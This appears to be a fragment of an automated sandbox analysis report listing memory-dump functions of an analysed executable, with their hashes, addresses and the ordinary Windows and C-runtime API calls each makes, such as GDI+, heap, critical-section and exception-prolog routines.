                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 3856339756-0
                                                                                                              • Opcode ID: da9e94b20b440074c5f7dc9391d46361beed6cbd9c9ef038941319bb83698bf8
                                                                                                              • Instruction ID: 31a03c09a639940f0a8d7dcc0ff49c6dfabc52d7af1b21e6bf11fe3e09e42534
                                                                                                              • Opcode Fuzzy Hash: da9e94b20b440074c5f7dc9391d46361beed6cbd9c9ef038941319bb83698bf8
                                                                                                              • Instruction Fuzzy Hash: D2E09A325046409FC310DB4CDD41B45BBE8FB48B20F10476AB91A83B60CB386804CB85
                                                                                                              APIs
                                                                                                                • Part of subcall function 00461D9A: try_get_function.LIBVCRUNTIME ref: 00461DAF
                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00460CC4
                                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00460CCF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                              • String ID:
                                                                                                              • API String ID: 806969131-0
                                                                                                              • Opcode ID: 571dd9c06b6932b5132005cab8554d17ece1e709271b30112048b35f420a7e20
                                                                                                              • Instruction ID: d1fd7747dee794f2816e0946ee3ba3c2a3cd39a4b25370eebd6b4c584f5a37f5
                                                                                                              • Opcode Fuzzy Hash: 571dd9c06b6932b5132005cab8554d17ece1e709271b30112048b35f420a7e20
                                                                                                              • Instruction Fuzzy Hash: BED0233554C70114DD0C33B1682245F2344D401BB97B0075FE0219D2D1FF1D9042B11F
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemShowWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3351165006-0
                                                                                                              • Opcode ID: ecf648a4c28002af27a820333cc49e76549a9b9aafad6d63fd9cc9f71efc3f53
                                                                                                              • Instruction ID: 080b7d21713b21ea0481b4166867f1335d5275c38fd72176f6c111166c49487d
                                                                                                              • Opcode Fuzzy Hash: ecf648a4c28002af27a820333cc49e76549a9b9aafad6d63fd9cc9f71efc3f53
                                                                                                              • Instruction Fuzzy Hash: 52C01232058200BFCB010BB0DC09C2EBBAAABE5212F00C928B6A9C00A0C238C060DB92
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(00481E74,?,?,?,?,0044A5A0,?,?,?,?,0046F79B,000000FF), ref: 0044FC42
                                                                                                              • LeaveCriticalSection.KERNEL32(00481E74,?,?,?,?,0044A5A0,?,?,?,?,0046F79B,000000FF), ref: 0044FC99
                                                                                                                • Part of subcall function 0044F9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0044FA05
                                                                                                                • Part of subcall function 0044F9D1: CloseHandle.KERNEL32(?,?), ref: 0044FA1F
                                                                                                                • Part of subcall function 0044F9D1: DeleteCriticalSection.KERNEL32(?), ref: 0044FA38
                                                                                                                • Part of subcall function 0044F9D1: CloseHandle.KERNELBASE(?), ref: 0044FA44
                                                                                                                • Part of subcall function 0044F9D1: CloseHandle.KERNEL32(?), ref: 0044FA50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
                                                                                                              • String ID:
                                                                                                              • API String ID: 3265325312-0
                                                                                                              • Opcode ID: f5bd80bc6b7e5edd0dfa1d540efc78dd227f54cce1fd7a4de20fc91c52c7beaf
                                                                                                              • Instruction ID: f687e4ab42bb4fd11f52a032bb754ae90c146d98864a258f69011ee1bfdbd55f
                                                                                                              • Opcode Fuzzy Hash: f5bd80bc6b7e5edd0dfa1d540efc78dd227f54cce1fd7a4de20fc91c52c7beaf
                                                                                                              • Instruction Fuzzy Hash: DAF0C8332056149BF6116725ECC09BFB71CE785765355053FFC04A7352DB29AC4A83AC
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID:
                                                                                                              • API String ID: 3519838083-0
                                                                                                              • Opcode ID: bd3c7ede9d077165bd059b936e7f7d42f4832e1c3774bb763c212e3c0d349f54
                                                                                                              • Instruction ID: c161b376353351f5112436352ef764b2be89ef0b6a499e466e17b3f69d250fb6
                                                                                                              • Opcode Fuzzy Hash: bd3c7ede9d077165bd059b936e7f7d42f4832e1c3774bb763c212e3c0d349f54
                                                                                                              • Instruction Fuzzy Hash: 47B1C270A00686AEFB18CF78C484BFAFBA6FF05304F14425BD455973A1C739A994CB99
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00448210
                                                                                                                • Part of subcall function 0044137E: __EH_prolog.LIBCMT ref: 00441383
                                                                                                                • Part of subcall function 0044137E: new.LIBCMT ref: 004413FB
                                                                                                                • Part of subcall function 004419B1: __EH_prolog.LIBCMT ref: 004419B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID:
                                                                                                              • API String ID: 3519838083-0
                                                                                                              • Opcode ID: 8c5714cfc62ca52c039f309f743b0ecd04e4a00600d5bd64a408da33a38c3240
                                                                                                              • Instruction ID: fcdcc7a5aea144cb706e116aa0e7d801a574ddf688e8c106706f856e13a87d5d
                                                                                                              • Opcode Fuzzy Hash: 8c5714cfc62ca52c039f309f743b0ecd04e4a00600d5bd64a408da33a38c3240
                                                                                                              • Instruction Fuzzy Hash: 7641A5719406589EEB24EB61C851BEEB3A9AF50704F0400EFE88A93153DF795EC8DB18
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID:
                                                                                                              • API String ID: 3519838083-0
                                                                                                              • Opcode ID: 51aa5561e6bc40f698cc70688ee8b2ac3e4634f60668784e82e1846b58a002fc
                                                                                                              • Instruction ID: 4a36dbc3edde8b17b802c0c5a19fa6fc2dffac2019addc1a7288e58a117ffab1
                                                                                                              • Opcode Fuzzy Hash: 51aa5561e6bc40f698cc70688ee8b2ac3e4634f60668784e82e1846b58a002fc
                                                                                                              • Instruction Fuzzy Hash: DA2103B5E40215ABDB149FB58D4266B76A8EB05319F00023FF905EB682D3B89944C6AC
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 0045948A
                                                                                                                • Part of subcall function 0044137E: __EH_prolog.LIBCMT ref: 00441383
                                                                                                                • Part of subcall function 0044137E: new.LIBCMT ref: 004413FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID:
                                                                                                              • API String ID: 3519838083-0
                                                                                                              • Opcode ID: 50fdd0bcc2df0303e03f927cb3e8dc342e2c6101478a2bbd5b629c5df45fff86
                                                                                                              • Instruction ID: b1477dc3d30b5d48c73df743dc4b5449f68629f3a29d8ee148d1abf222672a33
                                                                                                              • Opcode Fuzzy Hash: 50fdd0bcc2df0303e03f927cb3e8dc342e2c6101478a2bbd5b629c5df45fff86
                                                                                                              • Instruction Fuzzy Hash: A9218D72D04249EACF11DF95D9815EEB7B4AF19304F1004AFE809A3202E7396E49CB69
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID:
                                                                                                              • API String ID: 3519838083-0
                                                                                                              • Opcode ID: 9f028138aac632bdf626aceaeb0fd8c33fd830f04af29dde06809d6f84fccd3e
                                                                                                              • Instruction ID: ac7d34b6f17c86d0cbbc5311fdfcb730769daefb5a3529a0ac9881025d3a17fd
                                                                                                              • Opcode Fuzzy Hash: 9f028138aac632bdf626aceaeb0fd8c33fd830f04af29dde06809d6f84fccd3e
                                                                                                              • Instruction Fuzzy Hash: 7D11C273901429ABEF11AE58CC869DFB736AF48705F04452BFC15B7212CA388C0097A8
                                                                                                              APIs
                                                                                                                • Part of subcall function 00465A8D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0046634D,00000001,00000364,?,00462213,?,?,0047CBE8), ref: 00465ACE
                                                                                                              • _free.LIBCMT ref: 00468F50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 614378929-0
                                                                                                              • Opcode ID: ffe7a698f1ec9d313924040038d8a651e71016dbf9af90b8887af046bf84921e
                                                                                                              • Instruction ID: 2852effe91b04ba8f79109cac9fada78dee503a526f455be5af4eb1847991364
                                                                                                              • Opcode Fuzzy Hash: ffe7a698f1ec9d313924040038d8a651e71016dbf9af90b8887af046bf84921e
                                                                                                              • Instruction Fuzzy Hash: 680149B22003446BE725CF69C881D5AFBE9EB85374F25062FE18483280FB34AC05C779
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0046634D,00000001,00000364,?,00462213,?,?,0047CBE8), ref: 00465ACE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: eadb8657d618fcf88dc2d47ee5ac7a8ba827b060c83802a761ee560a45124a34
                                                                                                              • Instruction ID: 3b4ca6d66765afd4ca9781f2c4f5dd432f39a6c937b71d888772ade42c496b07
                                                                                                              • Opcode Fuzzy Hash: eadb8657d618fcf88dc2d47ee5ac7a8ba827b060c83802a761ee560a45124a34
                                                                                                              • Instruction Fuzzy Hash: 5EF0B431601E20AADB216BA29D85B5B3759EF81760F284327F819D7690FA68DC0146EF
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,004623AA,?,0000015D,?,?,?,?,00462F29,000000FF,00000000,?,?), ref: 00465A2E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: 3afe507479113539b3e941bb986253047c879a25e75a95942bc0d3b0d8295d52
                                                                                                              • Instruction ID: 448141ceed2a4e9a94730d3066820a0682d28ebdd8d9e1de55fbfef502cafe01
                                                                                                              • Opcode Fuzzy Hash: 3afe507479113539b3e941bb986253047c879a25e75a95942bc0d3b0d8295d52
                                                                                                              • Instruction Fuzzy Hash: 4BE06531201E219BEB3127E6EC4575B3649AF513A8F15032BAC19D6691FB2CCC0141AF
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00445B3A
                                                                                                                • Part of subcall function 0044AC66: __EH_prolog.LIBCMT ref: 0044AC6B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID:
                                                                                                              • API String ID: 3519838083-0
                                                                                                              • Opcode ID: cb51be8a92bf86fedf759c6ca3bd3d4ec5c45e151253ea1982094ac60b8eb73c
                                                                                                              • Instruction ID: 06a75c2ca8e0a1156b14715dce5f393bc3c654206830521cf49ccedbf07baca4
                                                                                                              • Opcode Fuzzy Hash: cb51be8a92bf86fedf759c6ca3bd3d4ec5c45e151253ea1982094ac60b8eb73c
                                                                                                              • Instruction Fuzzy Hash: 71018130904685DAEB04EBA5D4567DDF7E49F56308F00809FB85953282DFB82B0CD76B
                                                                                                              APIs
                                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0044A174
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseFind
                                                                                                              • String ID:
                                                                                                              • API String ID: 1863332320-0
                                                                                                              • Opcode ID: 0dae1bf1a7a3e6e651d0663212280d914494f0b4d8842191ffd6826a73064194
                                                                                                              • Instruction ID: bbea2b052391befeaf7eb2758da0100accfb704ec39959bc0a97259b6573bc09
                                                                                                              • Opcode Fuzzy Hash: 0dae1bf1a7a3e6e651d0663212280d914494f0b4d8842191ffd6826a73064194
                                                                                                              • Instruction Fuzzy Hash: C3F0B435409380EAEB225BB44404BC7BB905F16335F048A4EF1FD122D1C27954959726
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00441E93
                                                                                                                • Part of subcall function 004418F6: __EH_prolog.LIBCMT ref: 004418FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID:
                                                                                                              • API String ID: 3519838083-0
                                                                                                              • Opcode ID: c2ed2394214aa832dc1f2b4e50f8120019612ab84b748609600e436ff6f239f4
                                                                                                              • Instruction ID: d84339bf2102d69abb1f36464fb8d68f980e6d41a07b634fa1508cdd0e39f58a
                                                                                                              • Opcode Fuzzy Hash: c2ed2394214aa832dc1f2b4e50f8120019612ab84b748609600e436ff6f239f4
                                                                                                              • Instruction Fuzzy Hash: A6F0F8B1C002998EDF40EFA8C4456EEBBF1BB18304F1441BFD409E3212E7384644CB95
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00441E93
                                                                                                                • Part of subcall function 004418F6: __EH_prolog.LIBCMT ref: 004418FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID:
                                                                                                              • API String ID: 3519838083-0
                                                                                                              • Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                                              • Instruction ID: e02af4e2165349d4fc1ef0b30979ecfe05d5747b9102c4e45409ef6b847719fc
                                                                                                              • Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                                              • Instruction Fuzzy Hash: 20F0A5B1C012999EDF41EFA8C8456EEBBF1BB18304F1442BFD809E7212E7395644CB95
                                                                                                              APIs
                                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 0044F927
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExecutionStateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2211380416-0
                                                                                                              • Opcode ID: 374755bfd34bb8d6975db783291f975732fc7e7c305228550997235a9336979c
                                                                                                              • Instruction ID: 6bdfdb625f559193e780634b3ae1c15402679a1d0c4e513668d2327ca266ea98
                                                                                                              • Opcode Fuzzy Hash: 374755bfd34bb8d6975db783291f975732fc7e7c305228550997235a9336979c
                                                                                                              • Instruction Fuzzy Hash: 84D05BD570515162F61137297946BFE25074FC7319F09007FB508573D38A5D089E92BE
                                                                                                              APIs
                                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00458B6B
                                                                                                                • Part of subcall function 00458924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00458945
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                              • String ID:
                                                                                                              • API String ID: 1915507550-0
